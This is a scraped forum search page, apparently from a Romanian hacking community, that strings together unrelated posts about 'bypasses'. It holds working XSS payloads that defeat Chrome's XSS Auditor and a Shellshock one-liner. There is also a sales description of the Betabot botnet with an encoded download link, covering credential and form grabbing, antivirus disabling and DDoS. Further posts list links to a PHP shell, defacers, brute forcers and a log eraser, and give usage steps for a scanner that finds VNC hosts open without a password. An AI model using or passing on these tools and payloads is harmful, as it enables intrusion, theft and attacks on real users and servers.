Search the Community

Salut, folosesc Windows 10 Home si am uitat parola de la contul de administrator si m-am logat pe guest dar pe guest nu ma lasa sa folosesc comanda net user si nici sa instalez sau descarc programe pe el. Precizez ca am si K9 instalat pe el si am uitat parola si de la ala si nu ma lasa sa sterg sau mut bckd.sys din system32 ca sa fac bypass. Este vreo metoda sa reusesc sa fac bypass la K9 sau sa ma loghez in Contul de administrator ? (fara a avea nevoie de un Cd de reinstalare sau chestii dinastea, doar din cmd sau eu stiu..)

Since @brutelogic and I have had a lot of fun bypassing filters, creating challenges and finding new XSS methods and payloads in the past we thought we should try our luck on Chrome’s Auditor. You can read about the results of our research here. The bypasses we found can be used in many cases but there might be some situations where you can’t use them, for example when there’s no closing script tag or with some special chars after the actual payload like > or ?. However, there are some uncommon ways you could try. No closing script tag: When there’s no closing script tag our bypasses won’t work. They need at least one ” somewhere after the payload and </script> anywhere on the page after our injection. But there’s still a way to defeat the filter. We just have to use HTML imports. They will also be important for an uncommon bypass I’ll explain later. Their syntax is very simple: <link rel = "import" href = "/path/to/file.html"> In href we can specify any link we want as long as it doesn’t violate SOP. CORS might help here. Any link except one to a local resource is usually blocked by Chrome’s auditor. However if we use our known bypass we used with script src we are able to include a data: url. Our new payload would be <link rel = "import" href = "data:text/html&comma;&lt;script&gt;alert(document.domain)&lt;&sol;script&gt; We have to use html entities, otherwise our payload is flagged. This is possible as we are inside an href attribute now. [test] Working without being flagged This actually works in the sites context and would alert the domain name. No user interaction or closing script tag required. Local html inclusion This also relies on our link tag, but this time we play by the rules of the auditor. As I mentioned earlier we are only allowed to include local resources. The content type isn’t really important as this would also work with X-Content-Type-Options: nosniff. This gives us an interesting bypass opportunity. When we have an upload feature on the website where we want to inject our payload we can use it to upload a file with html code in its source. For example a .gif file with the content GIF89a<script>alert(1)</script> More info about that here, here and here. Even imgur would accept such a file (even though it can’t be displayed). Here’s the proof: imgur accepts this as a valid gif file Now let’s include it. We do this with <link rel = "import" href = "test.gif"> And there we go. It works! [test] Working great (DOM view) Multiple reflections That’s a whole different class of bypasses than the ones we’ve seen before. It’s not working due to an unclosed quote or the fact that the auditor trusts local resources that are passed without parameters. It is possible because the auditor sees a request with some html tags that look harmless on their own, but can be malicious if they occur more than once. This is usually achieved with script tags. A simple example where this would work is this: <a href = "INJECTION">INJECTION</a> You see, our injection is reflected two times i the same line. All we have to do now is this: \">"</script><script>alert(document.domain)-"\ What did we do here? Let me explain: First we break out of the href with \”>. The \ is required as it will escape the ” later in the script context. After that we have another “. This is going to mark the end of our string. Then we have a simple closing script tag. This won’t be recognized as malicious by the auditor as we have no starting script tag before. Now we start our new script with an opening script tag and write our payload after it. We now have to get rid of everything what’s behind our payload, otherwise we’d get a syntax error. We simply do this with a -“\. The ” will mark a new string and the \ will escape the quote that’s left of our payload. This is really hard to describe, so better see for yourself how the payload looks in the end: Some art right here Again this will alert. [click] Unfortunately this isn’t a common case. When we have multiple reflections they are often separated with newlines and other tags like here: This one looks harder, but is in fact easy We can’t use the trick we just used here. Simply because we have a newline that’s separating our payloads. So what would be a post about filter bypasses without template strings? I can’t even imagine it. As we know they allow multi-line strings which is exactly what we need here. Unfortunately the auditor knows about them and won’t allow them when there’s any character between an opening script tag and a template string. So what can we do about it? It’s really easy: ">`;alert(1)</script><script>` That way there’s no character between our template string and the script tag and we can enclose everything that would produce a syntax error. To be honest that same payload would also work on the first example of a double injection. Even a ‘ instead of the template string would. But it was a great challenge to try it with double quotes and backslashes. Here is our payload in action: [click] The ` makes it work in a multiline scenario All this is possible due to the fact that the auditor searches for the same dangerous string in a the request and response body, trusts local resources, doesn’t consider multi-injections and is not really strict to avoid false positives, which is important for a browser with such a market share. I’m sure there are some other bypasses just waiting to be found. You can try everything I showed you earlier when using this link: https://poc.asdizzle.com/auditor-tests/?mode=plain&q=INJECTION There’s different modes you can try: plain inline event image double double2 multi Have fun testing and Bye SOURCE : https://blog.asdizzle.com

Salutare, treaba-i simpla, de curand am achizitionat un telefon Samsung S5 caruia, desigur, i-am dat "Wipe data factory" din meniul "recovery", dupa ce am repornit telefonul mi-a cerut cont-ul samsung. Ei bine as dori sa ma ajutati daca aveti cunostintele necesare, sa fac bypass sau o alta metoda mai buna decat cea cu reinstalarea firmware-ului cu odin care mie nu mi-a functionat. Model: SM-G900F cu firmware: G900FXXU1BOC7

Bot http multitasking cu un atacuri DDoS func?ionale ?i altele. Descriere: ============================== List? de func?ii principale Betabot: ============================== * Nivel de sistem Userkit (Ring3 rootkit) Suporta 64 de \ 86 sisteme de bi?i. component intercepteaza rootkit apel x86 sistem func?ie nizkourovnennye (KiFastSystemCall ?i x86SwitchTo64BitMode) pentru a intercepta toate apelurile de sistem efectuate printr-un procedeu f?r? a l?sa urme vizibile de activit??i tale. Cârlige distan?? restaurat în mod automat bot. * ANTI-AV Module Folosind metoda ingineriei genetice sociale (scris în 12 limbi), care apare sub forma unei ferestre legal UAC, barca poate ridica drepturile lor la nivel de administrator. Dup? ob?inerea Betabot drepturi de administrator capabil s? incapacitatea mai mult de 30 de instrumente de antivirus! Rata de succes folosind aceast? metod? pentru aproximativ 70%! Aceast? func?ie este esen?ial? poate fi activat \ dezactivat prin intermediul panoului de control al re?elei bot! List? de instrumente anti-virus acceptate: AhnLab V3 Lite (numai XP) ArcaVir Avast! AVG Avira BitDefender (On config minim) BKAV BullGuard Emsisoft Anti-Malware ESET NOD32 / Smart Security F-PROT IS F-Secure GData IS Ikarus AV K7 AntiVirus Kaspersky AV / IS (doar versiunile mai vechi) Lavasoft Adaware AV Malwarebytes Anti-Malware McAfee Microsoft Security Essentials Norman AntiVirus Norton AntiVirus (numai Vista +) Outpost Firewall Pro Panda AV / IS Panda Cloud AV (versiunea gratuit?) PC Tools AntiVirus Cre?terea AV / IS Sophos Endpoint Antivirus Raport defensiva Trend Micro Vipre Webroot SecureAnywhere AV Windows Defender ZoneAlarm IS * MODUL anti-malware Acest modul v? permite s? scana?i Betabot de sistem (euristice) pentru prezen?a malware si distruge-le (Inclusiv necunoscut noi troieni \ \ virusi). Modul utile pentru cei care doresc s? "cure?e" sarcina lor de concuren?? în plus! * Modul de securitate bot Betabot Procesul \ fisierului bot \ Datele din registrul de Windows sunt sub protec?ia constant de la îndep?rtarea \ distrugere ?i include o varietate de metode (nu numai rootkit). La ?tergerea cheile de registry ?i fi?ier bot vor fi restaurate automat. Acest modul îmbun?t??e?te supravie?uire a desc?rc?ri dumneavoastr?! * Se injecteaz? în procesul de Betabot folose?te mai multe tehnologii samopisnyh injectare în procesul de a eluda o mul?ime de agen?i antivirali (în Runtime) Lista de runde: ArcaVir IS - bypass Avast - bypass Avast Internet Security - este injectat dar cauzeaza fereastr? Cutia cu nisip AVG Internet Security - bypass Avira - bypass Avira Internet Security - bypass BitDefender - bypass (în func?ie de set?rile) BullGuard - Încercarea de a ucide dup? o repornire Comodo - Fereastra Dr. Web - bypass ESET AV / ESET Smart Security - bypass F-Secure - bypass GData - Fereastra K7 AntiVirus - bypass Kaspersky Anti-Virus - bypass (în func?ie de set?rile) Kaspersky Internet Security - bypass (în func?ie de set?rile) McAfee Total Protection - bypass Norman IS - Fereastra Norton Internet Security - bypass Panda Internet Security 2013 - bypass PandaCloud - bypass PC Tools AntiVirus - bypass Rising IS - bypass Defensiva Total - bypass Trend Micro - bypass VIPRE - bypass ZoneAlarm - bypass * Modul Editor DNS Utilizeaza func?ie interceptare sunt esen?iale în victima responsabil pentru activitatea de DNS. Poate fi folosit pentru a înlocui produc?ia de loturile dumneavoastr? (de exemplu, prin phishing Facebook redirec?iona c?tre o pagin? p.r fals facebook.com 127.0.0.1) * C?utarea fi?ierelor Caut? fi?ierele din sistemul are set?ri flexibile ?i o varietate de filtre de cautare. Toate fi?ierele sunt ambalate într-o arhiv? ZIP ?i înc?rca?i la server. * Modulul form? Grabber Formele Rob din urm?toarele browsere: Mozilla Firefox (ultima versiune) Google Chrome (sprijin? SSL) Internet Explorer Toate jurnalele Formular hapsân convenabil sortate în panoul de control. * Modul Grabber FTP / POP3 / SSH Permite furt ?i parolele trimiterea în panoul de control. Totul are loc în timp real! (Putty, Filezilla, etc.) * Modul de protec?ie proactiv? (Aceast? func?ie este op?ional? ?i poate fi activat? \ dezactivat prin intermediul panoului de control) Oportunitati de protec?ie activ? mod bot în acest mod Betabot va bloca orice încercare de a instala software r?u inten?ionat în sistem, precum ?i pentru a detecta automat impotriva deja instalate ?i a le elimina din sistem amprenta! Uneori ai nevoie pentru a opri func?ia prin panoul de control (de exemplu, dac? dori?i s? desc?rca?i la RAT-ul progruz, inutil betabot-l distrug? în mod automat) ============================== Caracteristici suplimentare BETABOT: ============================== * <Size Build 150KB * <Editor Config * <Lock bootkit (nu instituie bootkits de familie Carberp / Rovnix / Gapz, etc.) * <Suport pentru 16 servere -------------------------- * <4 metode diferite de atacuri DDoS (UDP, HTTP inunda?ii, CONNECT-DECONECTA?I inunda?ii, SLOWLORIS FLOOD (KILL APACHE) - DDoS Slowloris de inunda?ii server de web Apache v? permite s? ucid? cu un num?r minim de boti - Conecta?i-Deconecta?i atacuri DDoS inunda?ii este o aparen?? de SYN se bazeaz? pe protocolul TCP. Spre deosebire de SYN unde nu suntem responsabili pentru pachet ACK de la server, CONNECT-DECONECTA?I inunda?ii dribleaz? complet TCP-strângere de mân? (compusul) ?i repet? atât de multe ori. Din cauza lipsei de resurse pentru a procesa num?rul mare de conexiuni la serverul incapacitate de munc?. Am decis s? nu pun? în aplicare inunda?ii SYN datorit? faptului c? potopul plin de acest tip nu sunt disponibile pe sisteme Windows (f?r? editare drivere Tcpip) Utilizarea drivere ter?i, astfel încât nu cel mai bun perspectiva. - HTTP atacuri DDoS împotriva inunda?iilor complet randomizat ?i optimizate - Atac Standard UDP de inunda?ii DDoS -------------------------- * <Autorun USB (LNK cu File) * <SOCKS 4 servere (preia ?osete proxy pe desc?rc?rile) * <Desc?rcare / Actualizare / executie - caracteristici standard înc?rc?tor (suporturi desc?rca fi?iere DLL în zombie memorie proces svchost.exe, precum ?i fi?iere JAR) Panou detaliate ?i frumos. Imagini panou: Acas?: http://i.imgur.com/hdXeq1P.png Editor DNS: http://i.imgur.com/K1tt7MC.png Forma hapsân filtre: http://i.imgur.com/Y7cShSd.png Realtime Grabber Chit / FTP / POP3: http://i.imgur.com/G03jQ8B.png Obiective: http://i.imgur.com/eDKBei0.png Configurarea Socks Proxy: http://i.imgur.com/ritA4WR.png Cerin?e pentru panoul de control În scopul de a g?zdui un panou de control de pe serverul dvs. nevoie de urmatoarele programe: • ionCube Loader 5.3+ • 5.3.x PHP • MySQL • PHPMyAdmin Dowload baza americana 64 aHR0cHMlM0EvL3d3dy5kcm9wYm94LmNvbS9zLzZ6YXQ1dGd6ODZlcmd3aS9CdWlsZGVyJTI1MjAxLjcucmFyJTNGZGwlM0Qw

###### Info ###### Title : Beyond SQLi: Obfuscate and Bypass Author : "ZeQ3uL" (Prathan Phongthiproek) and "Suphot Boonchamnan" Team : CWH Underground [http://www.exploit-db.com/author/?a=1275] Date : 2011-10-06 ########## Contents ########## [0x00] - Introduction [0x01] - Filter Evasion (Mysql) [0x01a] - Bypass Functions and Keywords Filtering [0x01b] - Bypass Regular Expression Filtering [0x02] - Normally Bypassing Techniques [0x03] - Advanced Bypassing Techniques [0x03a] - HTTP Parameter Pollution: Split and Join [0x03b] - HTTP Parameter Contamination [0x04] - How to protect your website [0x05] - Conclusion [0x06] - References [0x07] - Greetz To #Link: https://www.exploit-db.com/papers/17934/ @Nytro, Aveti un bug pe campul tags, se completeaza automat cu mai mult de 5 taguri si nu te lasa sa postezi sau sa dai preview. E aiurea daca vrei sa formatezi un articol/tutorial.

Today we have in the studio quite popular (over 500 thousand. Users) wonder extension that allows you to encrypt your traffic and bypass any blockage. The name of this miracle has ZenMate. Expanding ZenMate exists for: Google Chrome Opera Firefox browsers others I had not considered. It works much the same as the compression mode in the browser, but without actually compression. All your traffic is encrypted and sent through an intermediate server. Himself intermediate server is located in another country (you can select it), and from there actually is a request to load the site. Encryption and foreign servers provide the ability to bypass any local lock. And here is the official video: After installation, you must go through a short registration process to gain access to free capacity. It looks like he addon Personally, I liked what addon for FF anonymoX.

Last patch bypass. rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo Enjoy, depends on your OS maybe date could be $(date), Enjoy.

[+] AnonGhost PHP Shell [+] https://ghostbin.com/paste/9ckp3dst [+] Bypass Root Path With Zip File [+] https://ghostbin.com/paste/tdbvr2ug [+] Bypass Forbidden with Python via TCP Protocol [+] https://ghostbin.com/paste/qbrs9r8a [+] Wordpress 0day CSRF + Brute Token [+] https://ghostbin.com/paste/znxkcojv [+] Wordpress Index Hijack [+] https://ghostbin.com/paste/8wf2yj2v [+] CPanel & FTP Auto Defacer [+] https://ghostbin.com/paste/z6jfwrbm [+] Reverse IP Lookup [+] https://ghostbin.com/paste/kaa5na3x [+] Logs Eraser [+] https://ghostbin.com/paste/w9puv3kq [+] Facebook Multi-Account Bruteforce [+] https://ghostbin.com/paste/akn9adf8 [+] Bypass SafeMode [+] https://ghostbin.com/paste/j423dffz [+] Skype BruteForce [+] https://ghostbin.com/paste/r85xqq28 [+] Virtual Bypass Via Error_Log [+] https://ghostbin.com/paste/qjb2shhu [+] Shtml Bypass Symlink Via Error [+] https://ghostbin.com/paste/orqjsu6e [+] Bypass Users Server [+] https://ghostbin.com/paste/koew333z [+] Cpanel Mass Defacer [+] https://ghostbin.com/paste/nt3zc43b [+] Bypass Chmod Directory [+] https://ghostbin.com/paste/2q6vjea3 [+] Bypass Root Path [+] https://ghostbin.com/paste/y8jx2hfs [+] Wordpress Add Admin User [+] https://ghostbin.com/paste/ffqvakw8 [+] Server Informations [+] https://ghostbin.com/paste/om32c59z [+] Twitter Multi-Account Brute force [+] https://ghostbin.com/paste/hsmbtep8 [+] Symlink Bypass [+] https://ghostbin.com/paste/ywv75o46 [+] Bypass /etc/passwd [+] https://ghostbin.com/paste/6nuom97j Password: ./d3f4ult_v1rUsa

Document Title: =============== Facebook Bug Bounty #19 - Filter Bypass Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1381 Facebook Security ID: 221374210 Vulnerability Magazine: http://magazine.vulnerability-db.com/?q=articles/2015/01/14/facebook-bug-bounty-restriction-filter-bypass-vulnerability-id-221374210 Release Date: ============= 2015-01-14 Vulnerability Laboratory ID (VL-ID): ==================================== 1381 Common Vulnerability Scoring System: ==================================== 3.5 Product & Service Introduction: =============================== Facebook is an online social networking service, whose name stems from the colloquial name for the book given to students at the start of the academic year by some university administrations in the United States to help students get to know each other. It was founded in February 2004 by Mark Zuckerberg with his college roommates and fellow Harvard University students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris Hughes. The website`s membership was initially limited by the founders to Harvard students, but was expanded to other colleges in the Boston area, the Ivy League, and Stanford University. It gradually added support for students at various other universities before opening to high school students, and eventually to anyone aged 13 and over. Facebook now allows any users who declare themselves to be at least 13 years old to become registered users of the site. Users must register before using the site, after which they may create a personal profile, add other users as friends, and exchange messages, including automatic notifications when they update their profile. Additionally, users may join common-interest user groups, organized by workplace, school or college, or other characteristics, and categorize their friends into lists such as `People From Work` or `Close Friends`. As of September 2012, Facebook has over one billion active users, of which 8.7% are fake. According to a May 2011 Consumer Reports survey, there are 7.5 million children under 13 with accounts and 5 million under 10, violating the site`s terms of service. In May 2005, Accel partners invested $12.7 million in Facebook, and Jim Breyer added $1 million of his own money to the pot. A January 2009 Compete.com study ranked Facebook as the most used social networking service by worldwide monthly active users. Entertainment Weekly included the site on its end-of-the-decade `best-of` list, saying, `How on earth did we stalk our exes, remember our co-workers` birthdays, bug our friends, and play a rousing game of Scrabulous before Facebook?` Facebook eventually filed for an initial public offering on February 1, 2012, and was headquartered in Menlo Park, California. Facebook Inc. began selling stock to the public and trading on the NASDAQ on May 18, 2012. Based on its 2012 income of USD 5.1 Billion, Facebook joined the Fortune 500 list for the first time, being placed at position of 462 on the list published in 2013. (Copy of the Homepage: http://en.wikipedia.org/wiki/Facebook ) Abstract Advisory Information: ============================== The independent Vulnerability Laboratory Researcher Paulos Yibelo discovered a limitation bypass vulnerability in the official Mobile Site and mobile app (android/ios). Vulnerability Disclosure Timeline: ================================== 2014-12-10: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security) 2014-12-11: Vendor Notification (Facebook Security Team - Bug Bounty Program) 2014-12-15: Vendor Response/Feedback (Facebook Security Team - Bug Bounty Program) 2015-01-12: Vendor Fix/Patch (Facebook Developer Team - Reward: Bug Bounty) 2015-01-14: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A restriction/limitation bypass web vulnerability has been discovered in the official Facebook Mobile web-application framework. Facebook limits a name change for 60 days before a new name is applied. The advisory explains how i was able to bypass the restriction to change my `Alternative name` using parameter session tampering. First the attacker uses a restricted account (60 day) and review the changes by using a session tamper. By a permanent exchange of the name values the service updates the name value through the mobile service without usage of the secure restriction mechanism. Remote attackers are able to bypass the restriction to exploit the vulnerability. The attack vector of the issue is location on the application-side and the request method to inject is POST. Using this bug, a local attacker (a logged in user) can impersonate other users to manipulate their friends and change back to their account name (bypassing the 60day restriction). The security risk of the filter bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the filter mechanism vulnerability requires a low privileged web-application user account without user interaction. Successful exploitation of the bypass issue results in unauthorized account name changes through alternative name inputs. Request Method(s): [+] POST Vulnerable Service(s): [+] Facebook - Mobile Website [+] Facebook Apps - Apple iOS & Android Vulnerable Module(s): [+] ./settings/account/ Vulnerable Parameter(s): [+] name Proof of Concept (PoC): ======================= The bypass vulnerability can be exploited by remote attackers with a restricted user account and without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. Requirements: Attacker needs an account that changed its name and is limited for 60 (x) days before making any other changes Manual steps to reproduce the vulnerability ... 1. Go to https://m.facebook.com/settings/account/?name&refid=70 2. Click review changes and tamper the request, change the value of alternative name to anything 3. Continue the request and save the changed value 4. Submit request, then enter your test account password 5. Name value is changed even if time restriction was set Note: Alternative name shall then be updated too 6. Facebook vulnerability successful exploited! Reference(s): https://m.facebook.com/settings/account/?name&refid=70 Security Risk: ============== The security risk of the restriction/limitation bypass vulnerability in the change name function is estimated as medium. (CVSS 3.5) Credits & Authors: ================== Paulos Yibelo (paulosyibelo.com) Source

Scanner VNC bypass Link Download : Aici Cum se foloseste? - Odata descarcat: tar xvf vnc.tar - pentru dezarhivare cd .v - pentru a accesa directorul chmod 777 * - pentru a da permisiile necesare, se poate folosii si (chmod +x *) doar pentru executare. Pentru cautarea claselor de Romania : Aici , la sfarsitul paginii unde sunt "Ultimele Vizite". Sau puteti cauta pe alte site-uri de genu. Pentru a incepe scanarea: ./a ip.ip - exemplu ./a 86.124 Dupa terminarea scanarii: cat vncs.log - pentru a vedea ip-urile gasite. Vnc1Scan.jpg Cu un client vnc oarecare va puteti conecta fara parola pe ip-urile respective.